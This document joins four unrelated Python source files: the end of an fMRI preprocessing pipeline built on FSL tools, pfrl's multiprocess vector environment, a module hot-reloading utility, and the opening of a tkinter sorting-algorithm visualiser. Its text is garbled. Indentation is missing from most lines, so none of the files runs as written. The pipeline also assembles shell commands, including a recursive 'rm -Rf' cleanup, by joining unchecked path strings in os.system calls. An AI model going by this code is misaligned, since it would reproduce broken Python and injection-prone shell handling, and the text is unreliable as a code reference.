maskfile = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
print("Registered image: " + outfile)
os.system('mkdir -p $(dirname ' + entry.outputs + '/' + outfile + ')')
    os.system('cp -p ' + entry.wd + '/reg/' + entfunc['task'] + str(entfunc['run']) + '/' + 'highres2standard.nii.gz ' + entry.outputs + '/' + outfile)
    os.system('cp -p ' + entry.wd + '/reg/' + entfunc['task'] + str(entfunc['run']) + '/' + 'mask2standard.nii.gz ' + entry.outputs + '/' + maskfile)
## END SAVE_REGISTRATION
def run_snr(layout,entry):
import os
import sys
import subprocess
import multiprocessing
jobs=[];
returnflag=False
for func in layout.get(subject=entry.pid, space='native', desc='preproc', extension='nii.gz', suffix=['bold']):
imgpath = func.path
imgname = func.filename
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
t1w = layout.get(subject=entry.pid, space='T1w', desc='brain', extension='nii.gz', suffix='T1w')
t1wpath = t1w[0].path
if os.path.exists(entry.wd + '/snr/' + ent['task'] + str(ent['run']) +'/snr_calc/' + ent['task'] + '/' + 'snr.nii.gz') and not entry.overwrite:
print("SNR complete...skipping: " + imgname)
continue
print(" ")
        # ------- Running SNR calculation ------- #
s=', '
print('Calculating SNR: ' + imgpath)
# -------- run command -------- #
cmd = "bash " + entry.templates + "/run_snr.sh " + imgpath + " " + t1wpath + " " + entry.wd
name = "snr-" + ent['task'] + str(ent['run']) + "-" + ent['suffix']
p = multiprocessing.Process(target=worker, args=(name,cmd))
jobs.append(p)
p.start()
print(p)
returnflag=True
for job in jobs:
job.join() # wait for all preproc commands to finish
return returnflag
## end run_snr
def save_snr(layout,entry):
import os
import sys
# move outputs to permanent location...
for func in layout.get(subject=entry.pid, space='native', desc='preproc', extension='nii.gz', suffix=['bold']):
imgpath = func.path
imgname = func.filename
# output filename...
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
# Define the pattern to build out of the components passed in the dictionary
pattern = "fmripreproc/sub-{subject}/[ses-{session}/][{type}/]sub-{subject}[_ses-{session}][_task-{task}][_acq-{acquisition}][_rec-{reconstruction}][_run-{run}][_echo-{echo}][_dir-{direction}][_space-{space}][_desc-{desc}]_{suffix}.nii.gz",
# Add additional info to output file entities
ent['type'] = 'func'
ent['space'] = 'MNI152Nonlin2006'
ent['desc'] = 'preproc'
ent['suffix'] = 'snr'
outfile = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
print("SNR image: " + outfile)
os.system('mkdir -p $(dirname ' + entry.outputs + '/' + outfile + ')')
os.system('cp -p ' + entry.wd + '/snr/' + ent['task'] + str(ent['run']) +'/snr_calc/' + ent['task'] + '/' + 'snr.nii.gz ' + entry.outputs + '/' + outfile)
# --------------------- complete -------------------------- #
def run_outliers(layout,entry):
import os
import sys
import subprocess
import multiprocessing
jobs=[];
returnflag=False
for func in layout.get(subject=entry.pid, space='native', desc='preproc', extension='nii.gz', suffix=['bold']):
imgpath = func.path
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
# run from preproc images...
img1=ent['task'] + str(ent['run'])+".nii.gz"
img2=ent['task'] + str(ent['run'])+"_mcf.nii.gz"
path=entry.wd + '/preproc/'
if os.path.exists(entry.wd + '/preproc/' + ent['task'] + str(ent['run']) + '_fd_outliers.tsv') and not entry.overwrite:
print("Outlier Detection complete...skipping: " + ent['task'] + str(ent['run']))
continue
print(" ")
        # ------- Running outlier detection (DVARS / framewise displacement) ------- #
s=', '
print('Calculating Outliers: ' + imgpath)
# -------- run command -------- #
cmd = "bash " + entry.templates + "/run_outliers.sh " + path+img1 + " " + path+img2 + " " + entry.wd
name = "outlier-" + ent['task'] + str(ent['run']) + "-" + ent['suffix']
p = multiprocessing.Process(target=worker, args=(name,cmd))
jobs.append(p)
p.start()
print(p)
returnflag=True
for job in jobs:
job.join() # wait for all preproc commands to finish
return returnflag
## end run_outliers
def save_outliers(layout,entry):
import os
import sys
# move outputs to permanent location...
for func in layout.get(subject=entry.pid, space='native', desc='preproc', extension='nii.gz', suffix=['bold']):
imgpath = func.path
imgname = func.filename
# output filename...
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
# compile all outputs to single confounds file
workingpath=entry.wd + '/preproc/'
generate_confounds_file(workingpath,ent['task'] + str(ent['run']))
# Define the pattern to build out of the components passed in the dictionary
pattern = "fmripreproc/sub-{subject}/[ses-{session}/][{type}/]sub-{subject}[_ses-{session}][_task-{task}][_acq-{acquisition}][_rec-{reconstruction}][_run-{run}][_echo-{echo}][_dir-{direction}][_space-{space}][_desc-{desc}]_{suffix}.tsv",
# Add additional info to output file entities
ent['type'] = 'func'
ent['space'] = []
ent['desc'] = 'preproc'
ent['suffix'] = 'confounds'
outfile = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
print("Outliers file: " + outfile)
os.system('mkdir -p $(dirname ' + entry.outputs + '/' + outfile + ')')
os.system('cp -p ' + entry.wd + '/preproc/' + ent['task'] + str(ent['run']) + '_confounds.tsv ' + entry.outputs + '/' + outfile)
#save_outliers
def run_fast(layout,entry):
import os
import sys
import subprocess
import multiprocessing
returnflag=False
# check if output exists already
if os.path.exists(entry.wd + '/segment/t1w_brain_seg.nii.gz') and not entry.overwrite:
print('Tissue Segmentation output exists...skipping')
    else: # Run FAST
print("\nRunning FAST...\n")
t1w=layout.get(subject=entry.pid, extension='nii.gz', suffix='T1w')
t1w=t1w[0]
imgpath = t1w.path
imgname = t1w.filename
# output filename...
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
# -------- run command -------- #
cmd = "bash " + entry.templates + "/run_fast.sh " + imgpath + " " + entry.wd
name = "fast"
p = multiprocessing.Process(target=worker, args=(name,cmd))
p.start()
print(p)
returnflag=True
p.join() # blocks further execution until job is finished
return returnflag
def save_fast(layout,entry):
import os
import sys
t1w=layout.get(subject=entry.pid, extension='nii.gz', suffix='T1w')
imgpath=t1w[0].path
# output filename...
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
# Define the pattern to build out of the components passed in the dictionary
pattern = "fmripreproc/sub-{subject}/[ses-{session}/][{type}/]sub-{subject}[_ses-{session}][_task-{task}][_acq-{acquisition}][_rec-{reconstruction}][_run-{run}][_echo-{echo}][_dir-{direction}][_space-{space}][_desc-{desc}]_{suffix}.nii.gz"
# Add additional info to output file entities
ent['type'] = 'anat'
ent['space'] = 'T1w'
ent['desc'] = 'whitematter'
ent['suffix'] = 'mask'
out_wm_mask = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
ent['desc'] = 'greymatter'
out_gm_mask = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
ent['desc'] = 'csf'
out_csf_mask = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
os.system('mkdir -p $(dirname ' + entry.outputs + '/' + out_wm_mask + ')')
os.system('cp -p ' + entry.wd + '/segment/t1w_brain_seg_0.nii.gz ' + entry.outputs + "/" + out_csf_mask)
os.system('cp -p ' + entry.wd + '/segment/t1w_brain_seg_1.nii.gz ' + entry.outputs + "/" + out_gm_mask)
os.system('cp -p ' + entry.wd + '/segment/t1w_brain_seg_2.nii.gz ' + entry.outputs + "/" + out_wm_mask)
## end save_fast
def run_aroma_icamodel(layout,entry):
import os
import sys
import subprocess
import multiprocessing
jobs=[];
returnflag=False
for func in layout.get(subject=entry.pid, space='native', desc='preproc', extension='nii.gz', suffix=['bold']):
imgpath = func.path
imgname = func.filename
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
t1w = layout.get(subject=entry.pid, space='T1w', desc='brain', extension='nii.gz', suffix='T1w')
t1wpath = t1w[0].path
if os.path.exists(entry.wd + '/aroma/' + ent['task'] + str(ent['run']) +'_aroma_noHP.feat' + '/' + 'filtered_func_data.nii.gz') and not entry.overwrite:
print("AROMA model complete...skipping: " + imgname)
continue
print(" ")
        # ------- Running AROMA ICA model (FEAT, no highpass) ------- #
fsf_template = entry.templates + "/models/aroma_noHP.fsf"
stdimg = os.popen('echo $FSLDIR/data/standard/MNI152_T1_2mm_brain.nii.gz').read().rstrip()
s=', '
print('Running AROMA Model: ' + imgpath)
# -------- run command -------- #
cmd = "bash " + entry.templates + "/run_aroma_model.sh " + imgpath + " " + t1wpath + " " + fsf_template + " " + stdimg + " " + entry.wd
name = "aroma-model-" + ent['task'] + str(ent['run'])
p = multiprocessing.Process(target=worker, args=(name,cmd))
jobs.append(p)
p.start()
print(p)
returnflag=True
for job in jobs:
job.join() # wait for all aroma model commands to finish
return returnflag
## end run_aroma_icamodel
def run_aroma_classify(layout,entry):
import os
import sys
import subprocess
import multiprocessing
jobs=[];
returnflag=False
for func in layout.get(subject=entry.pid, space='native', desc='preproc', extension='nii.gz', suffix=['bold']):
imgpath = func.path
imgname = func.filename
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
t1w = layout.get(subject=entry.pid, space='T1w', desc='brain', extension='nii.gz', suffix='T1w')
t1wpath = t1w[0].path
if os.path.exists(entry.wd + '/aroma/aroma_classify/' + ent['task'] + str(ent['run']) + '/' + 'denoised_func_data_nonaggr.nii.gz') and not entry.overwrite:
print("AROMA classification complete...skipping: " + ent['task'] + str(ent['run']) )
continue
print(" ")
# check necessary input exists
if not os.path.exists(entry.wd + '/aroma/' + ent['task'] + str(ent['run']) +'_aroma_noHP.feat' + '/' + 'filtered_func_data.nii.gz'):
raise Exception("Cannot identify aroma feat model intended for aroma classification:" +ent['task'] + str(ent['run']) )
        # ------- Running AROMA classification ------- #
print('Running classification Model: ' + ent['task'] + str(ent['run']) )
# -------- run command -------- #
featdir=entry.wd + '/aroma/' + ent['task'] + str(ent['run']) +'_aroma_noHP.feat'
outdir=entry.wd + '/aroma/aroma_classify/' + ent['task'] + str(ent['run'])
cmd = "bash " + entry.templates + "/run_aroma_classify.sh " + featdir + " " + outdir
name = "aroma-classify-" + ent['task'] + str(ent['run'])
p = multiprocessing.Process(target=worker, args=(name,cmd))
jobs.append(p)
p.start()
print(p)
returnflag=True
for job in jobs:
job.join() # wait for all preproc commands to finish
return returnflag
def save_aroma_outputs(layout,entry):
import os
import sys
# move outputs to permanent location...
for func in layout.get(subject=entry.pid, space='native', desc='preproc', extension='nii.gz', suffix=['bold']):
imgpath = func.path
imgname = func.filename
# output filename...
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
# Define the pattern to build out of the components passed in the dictionary
pattern = "fmripreproc/sub-{subject}/[ses-{session}/][{type}/]sub-{subject}[_ses-{session}][_task-{task}][_acq-{acquisition}][_rec-{reconstruction}][_run-{run}][_echo-{echo}][_dir-{direction}][_space-{space}][_desc-{desc}]_{suffix}.nii.gz",
# Add additional info to output file entities
ent['type'] = 'func'
ent['space'] = 'native'
ent['desc'] = 'smoothAROMAnonaggr'
ent['suffix'] = 'bold'
outfile = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
print("AROMA image: " + outfile)
os.system('mkdir -p $(dirname ' + entry.outputs + '/' + outfile + ')')
infile = entry.wd + '/aroma/aroma_classify/' + ent['task'] + str(ent['run']) + '/' + 'denoised_func_data_nonaggr.nii.gz'
os.system('cp -p ' + infile + ' ' + entry.outputs + '/' + outfile)
def generate_confounds_file(path,task):
import os
import sys
import pandas as pd
    # after running fsl outliers - put all confounds into one file
df=pd.DataFrame()
files = ["dvars_metrics", "fd_metrics" ]
for f in files:
d=pd.read_csv(path + "/" + task + "_" + f + ".tsv",sep="\s+")
colnames = f.strip("metrics").strip("_")
d.columns = [colnames]
df = pd.concat([df,d],axis=1)
files = ["dvars_outliers", "fd_outliers" ]
for f in files:
if os.path.exists(path+"/"+ task + "_" + f + ".tsv"):
d=pd.read_csv(path+"/"+ task + "_" + f + ".tsv",sep="\s+")
mylist=list(range(0,d.shape[1]))
colnames = [f + "_" + str(s) for s in mylist]
d.columns = colnames
df = pd.concat([df,d],axis=1)
# output a single confounds file
df.to_csv(path +"/"+ task + "_confounds.tsv",sep="\t")
# END GENERATE_CONFOUNDS_FILE
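# Sketch of the resulting <task>_confounds.tsv (hypothetical values; the *_outliers_N
# columns only appear when the corresponding outlier TSVs exist):
#       dvars   fd      dvars_outliers_0   fd_outliers_0
#   0   1.21    0.05    0                  0
#   1   0.87    0.31    0                  1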
# def run_aroma_preprocess(layout,entry):
# # run second motion correction - seems unnecessary??
def generate_report():
# generates a summary report of the preprocessing pipeline.
# 1. registration quality (fsl images)
# 2. outlier detection (plot)
# 3. carpet plot for each func? - before / after aroma?
# 4. description of methods
return True
# generate snr tests...
# /projects/ics/software/fsl/6.0.3/bin/slicer highres2standard standard -s 2 -x 0.35 sla.png -x 0.45 slb.png -x 0.55 slc.png -x 0.65 sld.png -y 0.35 sle.png -y 0.45 slf.png -y 0.55 slg.png -y 0.65 slh.png -z 0.35 sli.png -z 0.45 slj.png -z 0.55 slk.png -z 0.65 sll.png ; /projects/ics/software/fsl/6.0.3/bin/pngappend sla.png + slb.png + slc.png + sld.png + sle.png + slf.png + slg.png + slh.png + sli.png + slj.png + slk.png + sll.png highres2standard1.png
# /projects/ics/software/fsl/6.0.3/bin/fsl_tsplot -i prefiltered_func_data_mcf.par -t 'MCFLIRT estimated translations (mm)' -u 1 --start=4 --finish=6 -a x,y,z -w 640 -h 144 -o trans.png
def run_cleanup(entry):
import os
import sys
import subprocess
import multiprocessing
jobs=[];
#concatenate and move logs to final dir...
# remove working directory if requested...
if entry.cleandir == True:
os.system('rm -Rf ' + entry.wd)
## end run_cleanup
def main(argv):
import glob
import re
import os
import sys
import warnings
# get user entry
entry = parse_arguments(argv)
os.makedirs(entry.wd, mode=511, exist_ok=True)
logdir = entry.wd + '/logs'
os.makedirs(logdir, mode=511, exist_ok=True)
# get participant bids path:
bids = bids_data(entry)
# pipeline: (1) BET, (2) topup, (3) distortion correction, (4) mcflirt
# bet
if run_bet(bids,entry):
save_bet(bids,entry)
# distortion correction
run_topup(bids,entry)
run_distcorrepi(bids,entry)
# motion correction + trim
if run_preprocess(bids,entry):
save_preprocess(bids,entry)
# add derivatives to bids object
bids.add_derivatives(entry.outputs + '/fmripreproc/')
# registration
if run_registration(bids,entry):
save_registration(bids,entry)
# snr
if run_snr(bids,entry):
save_snr(bids,entry)
# generate confounds
run_outliers(bids,entry)
save_outliers(bids,entry)
# fast
if run_fast(bids,entry):
save_fast(bids,entry)
# aroma
if run_aroma_icamodel(bids,entry) or run_aroma_classify(bids,entry):
save_aroma_outputs(bids,entry)
save_bet(bids,entry)
save_preprocess(bids,entry)
save_registration(bids,entry)
save_snr(bids,entry)
save_fast(bids,entry)
save_aroma_outputs(bids,entry)
# clean-up
# run_cleanup(entry)
__version__ = "0.0.2" # version is needed for packaging
if __name__ == "__main__":
import sys
main(sys.argv[1:])
|
multiprocess_vector_env.py
|
import signal
import warnings
from multiprocessing import Pipe, Process
import numpy as np
from torch.distributions.utils import lazy_property
import pfrl
def worker(remote, env_fn):
# Ignore CTRL+C in the worker process
signal.signal(signal.SIGINT, signal.SIG_IGN)
env = env_fn()
try:
while True:
cmd, data = remote.recv()
if cmd == "step":
ob, reward, done, info = env.step(data)
remote.send((ob, reward, done, info))
elif cmd == "reset":
ob = env.reset()
remote.send(ob)
elif cmd == "close":
remote.close()
break
elif cmd == "get_spaces":
remote.send((env.action_space, env.observation_space))
elif cmd == "spec":
remote.send(env.spec)
elif cmd == "seed":
remote.send(env.seed(data))
else:
raise NotImplementedError
finally:
env.close()
class MultiprocessVectorEnv(pfrl.env.VectorEnv):
"""VectorEnv where each env is run in its own subprocess.
Args:
env_fns (list of callable): List of callables, each of which
returns gym.Env that is run in its own subprocess.
"""
def __init__(self, env_fns):
if np.__version__ == "1.16.0":
warnings.warn(
"""
NumPy 1.16.0 can cause severe memory leak in pfrl.envs.MultiprocessVectorEnv.
We recommend using other versions of NumPy.
See https://github.com/numpy/numpy/issues/12793 for details.
"""
) # NOQA
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [
Process(target=worker, args=(work_remote, env_fn))
for (work_remote, env_fn) in zip(self.work_remotes, env_fns)
]
for p in self.ps:
p.start()
self.last_obs = [None] * self.num_envs
self.remotes[0].send(("get_spaces", None))
self.action_space, self.observation_space = self.remotes[0].recv()
self.closed = False
def __del__(self):
if not self.closed:
self.close()
@lazy_property
def spec(self):
self._assert_not_closed()
self.remotes[0].send(("spec", None))
spec = self.remotes[0].recv()
return spec
def step(self, actions):
self._assert_not_closed()
for remote, action in zip(self.remotes, actions):
remote.send(("step", action))
results = [remote.recv() for remote in self.remotes]
self.last_obs, rews, dones, infos = zip(*results)
return self.last_obs, rews, dones, infos
def reset(self, mask=None):
self._assert_not_closed()
if mask is None:
mask = np.zeros(self.num_envs)
for m, remote in zip(mask, self.remotes):
if not m:
remote.send(("reset", None))
obs = [
remote.recv() if not m else o
for m, remote, o in zip(mask, self.remotes, self.last_obs)
]
self.last_obs = obs
return obs
def close(self):
self._assert_not_closed()
self.closed = True
for remote in self.remotes:
remote.send(("close", None))
for p in self.ps:
p.join()
def seed(self, seeds=None):
self._assert_not_closed()
if seeds is not None:
if isinstance(seeds, int):
seeds = [seeds] * self.num_envs
elif isinstance(seeds, list):
if len(seeds) != self.num_envs:
raise ValueError(
"length of seeds must be same as num_envs {}".format(
self.num_envs
)
)
else:
raise TypeError(
"Type of Seeds {} is not supported.".format(type(seeds))
)
else:
seeds = [None] * self.num_envs
for remote, seed in zip(self.remotes, seeds):
remote.send(("seed", seed))
results = [remote.recv() for remote in self.remotes]
return results
@property
def num_envs(self):
return len(self.remotes)
def _assert_not_closed(self):
assert not self.closed, "This env is already closed"
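# A minimal usage sketch (assumes the `gym` package with the classic 4-tuple step API is
# installed; the env name and the number of workers are arbitrary):
if __name__ == "__main__":
    import gym

    # Each callable constructs an independent env inside its own subprocess.
    vec_env = MultiprocessVectorEnv([lambda: gym.make("CartPole-v0") for _ in range(4)])
    obs = vec_env.reset()
    obs, rews, dones, infos = vec_env.step(
        [vec_env.action_space.sample() for _ in range(vec_env.num_envs)]
    )
    print(rews)
    vec_env.close()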
|
hotswap.py
|
#!/usr/bin/env python
"""Automatic replacement of imported Python modules.
The hotswap module watches the source files of imported modules which are
replaced by its new version when the respective source files change.
The need for a program restart during development of long-running programs
like GUI applications for example is reduced.
Additionally this module can be called as a wrapper script:
hotswap.py [OPTIONS] <module.py> [args]
In this case module.py is imported as module and the function
module.main() is called. Hotswapping is enabled so that changes
in the source code take effect without restarting the program.
"""
version = "0.3.1"
__author__ = "Michael Krause"
__email__ = "michael@krause-software.com"
#
# CREDITS
# The idea and first implementation of the mechanism used by this module
# was first made public by Thomas Heller in a Usenet posting
# to comp.lang.python in 2001 (named autoreload.py).
# Updates for new-style classes were taken from a Usenet posting
# by Jeremy Fincher.
__all__ = ['run', 'stop', 'superreload']
import time
import os
import threading
import sys
import types
import imp
import getopt
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
try:
reload
except NameError:
from importlib import reload
if PY2:
TypeType = types.TypeType
ClassType = types.ClassType
else:
TypeType = type
ClassType = type
def _get_compiled_ext():
for ext, mode, typ in imp.get_suffixes():
if typ == imp.PY_COMPILED:
return ext
# the official way to get the extension of compiled files (.pyc or .pyo)
PY_COMPILED_EXT = _get_compiled_ext()
class ModuleWatcher:
SECONDS_BETWEEN_CHECKS = 0.1
SKIP_SYSTEM_MODULES = False
NOTIFYFUNC = None
VERBOSE = False
running = 0
def __init__(self):
# If we don't do this, there may be tracebacks
# when shutting down python.
import atexit
atexit.register(self.stop)
def run(self, skipsystem=SKIP_SYSTEM_MODULES,
seconds=SECONDS_BETWEEN_CHECKS,
notifyfunc=NOTIFYFUNC,
verbose=VERBOSE):
if self.running:
if verbose:
print("# hotswap already running")
return
self.SKIP_SYSTEM_MODULES = skipsystem
self.SECONDS_BETWEEN_CHECKS = seconds
self.NOTIFYFUNC = notifyfunc
self.VERBOSE = verbose
if self.VERBOSE:
print("# starting hotswap seconds=%s, skipsystem=%s" \
% (self.SECONDS_BETWEEN_CHECKS, self.SKIP_SYSTEM_MODULES))
self.running = 1
self.thread = threading.Thread(target=self._check_modules)
self.thread.setDaemon(1)
self.thread.start()
def stop(self):
if not self.running:
if self.VERBOSE:
print("# hotswap not running")
return
self.running = 0
self.thread.join()
if self.VERBOSE:
print("# hotswap stopped")
def _check_modules(self):
last_modified = {}
while self.running:
time.sleep(self.SECONDS_BETWEEN_CHECKS)
for m in list(sys.modules.values()):
if not hasattr(m, '__file__'):
# We only check modules that have a plain file
# as Python source.
continue
if m.__name__ == '__main__':
# __main__ cannot be reloaded without executing
# its code a second time, so we skip it.
continue
file = m.__file__
path, ext = os.path.splitext(file)
if self.SKIP_SYSTEM_MODULES:
# do not check system modules
sysprefix = sys.prefix + os.sep
if file.startswith(sysprefix):
continue
if ext.lower() == '.py':
ext = PY_COMPILED_EXT
if ext != PY_COMPILED_EXT:
continue
sourcefile = path + '.py'
try:
source_mtime = os.stat(sourcefile)[8]
if sourcefile not in last_modified:
last_modified[sourcefile] = source_mtime
continue
else:
if source_mtime <= last_modified[sourcefile]:
continue
last_modified[sourcefile] = source_mtime
except OSError:
continue
try:
superreload(m, verbose=self.VERBOSE)
except:
import traceback
traceback.print_exc(0)
try:
if hasattr(m, 'onHotswap') and callable(m.onHotswap):
# The module can invalidate cached results or post
# redisplay operations by defining function named
# onHotswap that is called after a reload.
m.onHotswap()
if callable(self.NOTIFYFUNC):
self.NOTIFYFUNC(module=m)
except:
import traceback
traceback.print_exc(0)
def update_function(old, new, attrnames):
for name in attrnames:
try:
setattr(old, name, getattr(new, name))
except AttributeError:
pass
def superreload(module,
reload=reload,
_old_objects = {},
verbose=True):
"""superreload (module) -> module
Enhanced version of the builtin reload function.
superreload replaces the class dictionary of every top-level
class in the module with the new one automatically,
as well as every function's code object.
"""
# retrieve the attributes from the module before the reload,
# and remember them in _old_objects.
for name, object in module.__dict__.items():
key = (module.__name__, name)
_old_objects.setdefault(key, []).append(object)
if verbose:
print("# reloading module %r" % module)
newmodule = reload(module)
if newmodule is None:
return module
# XXX We have a problem here if importing the module fails!
# iterate over all objects and update them
for name, new_obj in newmodule.__dict__.items():
# print "updating", `name`, type(new_obj), `new_obj`
key = (newmodule.__name__, name)
if key in _old_objects:
for old_obj in _old_objects[key]:
if type(new_obj) == ClassType:
if hasattr(old_obj.__dict__, 'update'):
old_obj.__dict__.update(new_obj.__dict__)
elif type(new_obj) == types.FunctionType:
update_function(old_obj,
new_obj,
"func_code func_defaults func_doc".split())
elif type(new_obj) == types.MethodType:
update_function(old_obj.im_func,
new_obj.im_func,
"func_code func_defaults func_doc".split())
return newmodule
_watcher = ModuleWatcher()
run = _watcher.run
stop = _watcher.stop
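# Typical in-process usage (a minimal sketch): start the watcher from a long-running
# program, then edit imported modules while it runs.
#   import hotswap
#   hotswap.run(verbose=True)   # background thread polls source files and reloads changes
#   ...                         # long-running code; edited modules are swapped in place
#   hotswap.stop()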
def modulename(path):
return os.path.splitext(path)[0].replace(os.sep, '.')
def importmodule(filename):
"""Returns the imported module of this source file.
This function tries to find this source file as module
on the Python path, so that its typical module name is used.
If this does not work, the directory of this file is inserted
at the beginning of sys.path and the import is attempted again.
"""
sourcefile = os.path.abspath(filename)
modfile = os.path.basename(sourcefile)
# Given an absolute filename of a python source file,
# we need to find it on the Python path to calculate its
# proper module name.
candidates = []
for p in sys.path:
pdir = p + os.sep
checkfile = os.path.join(p, modfile)
if os.path.normcase(sourcefile).startswith(os.path.normcase(pdir)):
relmodfile = sourcefile[len(pdir):]
candidates.append((len(relmodfile), relmodfile))
if candidates:
# Pick the most specific module path from all candidates
candidates.sort()
modname = modulename(candidates[0][1])
else:
modname = modulename(os.path.basename(sourcefile))
try:
# In case the source file was in the Python path
# it can be imported now.
module = __import__(modname, globals(), locals(), [])
except ImportError as e:
failed_modname = str(e).split()[-1]
failed_modname = failed_modname.replace("'", "")
if failed_modname == modname:
# The ImportError wasn't caused by some nested import
# but our module was not found, so we add the source files
# directory to the path and import it again.
modname = modulename(os.path.basename(sourcefile))
sys.path.insert(0, os.path.dirname(sourcefile))
module = __import__(modname, globals(), locals(), [])
else:
import traceback
            exc_type, exc_value, tb = sys.exc_info()
            if tb:
                tb = tb.tb_next
            traceback.print_exception(exc_type, exc_value, tb)
# The module to be imported could be found but raised an
# ImportError itself.
raise e
# We have to deal module nesting like logging.handlers
# before calling the modules main function.
components = modname.split('.')
for comp in components[1:]:
module = getattr(module, comp)
return module
#----------------------------------------------------------------------------
class Usage(Exception):
def __init__(self, msg):
self.msg = msg
def usage(argv0):
    print("""Usage: %s [OPTIONS] <module.py>
Import module and call module.main() with hotswap enabled.
Subsequent modifications in module.py and other source files of
modules being used are monitored periodically and put into effect
without restarting the program.
Options:
  -h, --help        Display this help then exit.
  -w, --wait        Wait number of seconds between checks. [0.1]
  -s, --skipsystem  Skip check of system modules beneath (%s). [False]
  -v, --verbose     Display diagnostic messages. [False]
""" % (argv0, sys.prefix), file=sys.stderr)
#----------------------------------------------------------------------------
def main(argv=None):
if argv is None:
argv = sys.argv
wait = ModuleWatcher.SECONDS_BETWEEN_CHECKS
skipsystem = ModuleWatcher.SKIP_SYSTEM_MODULES
verbose = ModuleWatcher.VERBOSE
# parse command line arguments
try:
try:
opts, args = getopt.getopt(argv[1:], "hw:sv",
["help", "wait",
"skipsystem", "verbose"])
except getopt.error as msg:
raise Usage(msg)
for o, a in opts:
if o in ("-h", "--help"):
usage(argv[0])
return 0
if o in ("-w", "--wait"):
try:
wait = float(a)
except ValueError:
raise Usage("Parameter -w/--wait expects a float value")
if o in ("-s", "--skipsystem"):
skipsystem = True
if o in ("-v", "--verbose"):
verbose = True
except Usage as err:
        print("%s:" % argv[0], err.msg, file=sys.stderr)
        print("for help use --help", file=sys.stderr)
return 2
# Remove hotswap options from arguments
if args:
del argv[1:-len(args)]
else:
del argv[1:]
if len(argv) <= 1:
usage(argv[0])
sys.exit(1)
firstarg = argv[1]
sourcefile = os.path.abspath(firstarg)
if not os.path.isfile(sourcefile):
print("%s: File '%s' does not exist." % (os.path.basename(argv[0]),
sourcefile))
sys.exit(1)
try:
module = importmodule(sourcefile)
except ImportError as e:
print("%s: Unable to import '%s' as module: %s" % (os.path.basename(argv[0]),
sourcefile, e))
sys.exit(1)
# Remove hotswap.py from arguments that argv looks as
# if no additional wrapper was present.
del argv[0]
# Start hotswapping
run(skipsystem=skipsystem,
seconds=wait,
verbose=verbose)
# Run the Python source file with hotswapping enabled.
module.main()
if __name__ == '__main__':
main()
|
Start_Sorting.py
|
from tkinter import *
from tkinter import messagebox
from random import shuffle, sample
from Codes.Sorting_Algorithms import algochooser
from colorsys import hls_to_rgb
from threading import *
import Codes.Start_Threading
# Main sorting class
class Sorting:
def __init__(self, root, AlgoNameVar):
# Sorting window
self.root = root
# warning for close/exit
self.root.protocol("WM_DELETE_WINDOW", self.Close)
# Selected Algorithm Name
self.AlgoNameVar = AlgoNameVar
# Window Size
self.wx, self.wy = 1200, 700
# Screen Size
self.wxs, self.wys = self.root.winfo_screenwidth(), self.root.winfo_screenheight()
# Aligning the window in the center of the screen
self.WINDOW_X, self.WINDOW_Y = (self.wxs / 2) - (self.wx / 2), (self.wys / 2) - (self.wy / 2)
# Sorting canvas size
self.CANVAS_X, self.CANVAS_Y = 950, 700
# Left side information frame size
self.FRAME1_X, self.FRAME1_Y = 250, 700
# Apply changes to window
self.root.geometry('%dx%d+%d+%d' % (self.wx, self.wy, self.WINDOW_X, self.WINDOW_Y))
self.root.config(bg="grey")
self.root.wm_resizable(False, False)
# Title And Icon
self.root.title("Sorting Algorithm Visualizer")
try:
self.root.iconbitmap("Images/sorting.ico")
except:
img = PhotoImage("Images/sorting.ico")
self.root.tk.call('wm', 'iconphoto', self.root._w, img)
# Starting size of the array
self.size_var = IntVar()
self.size_var.set(30)
# Starting speed of the array
self.speed_var = IntVar()
self.speed_var.set(20)
# Graph type bar or color
# 0 means bar 1 means color
self.graph_type = IntVar()
self.graph_type.set(0)
self.TYPE = self.graph_type.get()
# Starting point of the graph
self.starting_point = 2
# Creating frame in the left side
self.frame1 = Frame(root, width=self.FRAME1_X, height=self.FRAME1_Y, bg="light salmon")
self.frame1.grid_propagate(0)
self.frame1.pack(side=LEFT)
# Algorithm Information Table
self.information = {'Bubble Sort': "Worst Case:O(n²)\nAverage Case:O(n²)\nBest Case:O(n)",
'Selection Sort': "Worst Case:O(n²)\nAverage Case:O(n²)\nBest Case:O(n²)",
'Merge Sort': "Worst Case:O(n*log n)\nAverage Case:O(n*log n)\nBest Case:O(n*log n)",
'Heap Sort': "Worst Case:O(n*log n)\nAverage Case:O(n*log n)\nBest Case:O(n*log n)",
'Insertion Sort': "Worst Case:O(n²)\nAverage Case:O(n²)\nBest Case:O(n)",
'Quick Sort': "Worst Case:O(n²)\nAverage Case:O(n*log n)\nBest Case:O(n*log n)",
'Shell Sort': "Worst Case:O(n²)\nAverage Case:O(n²)\nBest Case:O(n*log n)",
'Radix Sort': "Worst Case:O(k*(n+b))\nAverage Case:O(k*(n+b))\nBest Case:O(k*(n+b))"}
# Algorithm Names
self.algorithm = ['Selection Sort', 'Insertion Sort', 'Bubble Sort', 'Merge Sort', 'Quick Sort', 'Heap Sort',
'Shell Sort', 'Radix Sort']
# Creating a drop down menu for algorithm selection
self.algo_var = StringVar()
# Setting it default value to what we selected previously in the main window
self.algo_var.set(self.AlgoNameVar)
